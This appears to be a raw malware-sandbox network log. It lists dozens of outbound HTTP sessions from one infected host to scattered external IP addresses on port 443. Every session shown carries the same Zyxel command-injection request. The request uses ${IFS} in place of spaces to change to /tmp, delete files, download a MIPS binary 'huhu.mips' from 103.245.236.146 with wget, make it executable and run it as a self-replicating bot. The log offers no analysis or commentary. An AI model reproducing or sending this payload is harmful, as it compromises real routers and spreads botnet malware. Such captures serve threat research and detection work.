                                      Jan 19, 2024 17:29:29.706053972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3534192.168.2.1441340221.40.37.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.706108093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3535192.168.2.1442104156.21.90.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.706151962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3536192.168.2.1452846209.24.41.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.706192970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3537192.168.2.1443902105.57.248.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.706218958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3538192.168.2.144855097.14.17.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.706243992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3539192.168.2.1445306132.129.50.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.706321955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3540192.168.2.1441516200.163.238.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.706355095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3541192.168.2.1443590149.210.72.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.706381083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3542192.168.2.143307066.197.143.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.706434011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3543192.168.2.1442358182.136.147.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.706459999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3544192.168.2.145374038.186.90.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.706507921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3545192.168.2.1442084109.70.202.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.706545115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3546192.168.2.1449304205.246.94.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.706573963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3547192.168.2.1448992131.60.216.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.706617117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3548192.168.2.143618442.62.132.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.706650972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3549192.168.2.145603493.140.255.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.706697941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3550192.168.2.144064869.138.77.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.706737995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3551192.168.2.1458406142.151.192.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.706779003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3552192.168.2.1459816140.255.13.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.706789017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3553192.168.2.143881424.35.166.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.706808090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3554192.168.2.1457648186.63.108.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.706849098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3555192.168.2.145373893.98.36.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.706887960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3556192.168.2.1460740201.66.215.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.706927061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3557192.168.2.146030052.78.104.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.706971884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3558192.168.2.1452102192.102.132.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.707004070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3559192.168.2.1450454190.246.244.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.707037926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3560192.168.2.143529678.193.101.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.707066059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3561192.168.2.1457710100.212.59.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.707135916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3562192.168.2.1435282194.206.25.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.707173109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3563192.168.2.145897618.93.94.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.707231998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3564192.168.2.1450608140.27.28.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.707257986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3565192.168.2.1438376219.79.142.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.707313061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3566192.168.2.1452004196.28.132.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.707345009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3567192.168.2.1440246207.77.123.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.707376003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3568192.168.2.1454040152.33.255.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.707420111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3569192.168.2.145358069.168.98.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.707458973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3570192.168.2.1448578222.173.63.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.707513094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3571192.168.2.145677839.52.3.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.707542896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3572192.168.2.145048265.96.206.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.707587004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3573192.168.2.1436140188.251.71.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.707616091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3574192.168.2.143468070.62.244.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.707642078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3575192.168.2.143488419.168.221.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.707679987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3576192.168.2.144833852.139.48.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.707704067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3577192.168.2.143606683.181.237.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.707741976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3578192.168.2.143942818.80.116.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.707786083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3579192.168.2.1457394202.76.82.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.707823038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3580192.168.2.1454578108.62.133.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.707856894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3581192.168.2.1444402133.193.57.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.707900047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3582192.168.2.1438374185.98.81.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.707923889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3583192.168.2.1434702182.191.116.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.707964897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3584192.168.2.1440606146.54.42.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.708020926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3585192.168.2.1438906164.225.137.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.708050013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3586192.168.2.143522662.156.35.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.708090067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3587192.168.2.144587443.15.188.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.708126068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3588192.168.2.14559822.30.46.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.708151102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3589192.168.2.1453012195.216.44.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.708197117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3590192.168.2.144273036.124.103.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.708229065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3591192.168.2.146063248.242.126.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.708261967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3592192.168.2.1450826185.9.28.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.708324909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3593192.168.2.1460486194.243.129.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.708350897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3594192.168.2.145470465.219.50.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.708379030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3595192.168.2.1440626126.205.46.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.708426952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3596192.168.2.144109092.174.57.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.708488941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3597192.168.2.1451128181.64.134.161443
                                      TimestampBytes transferredDirectionData
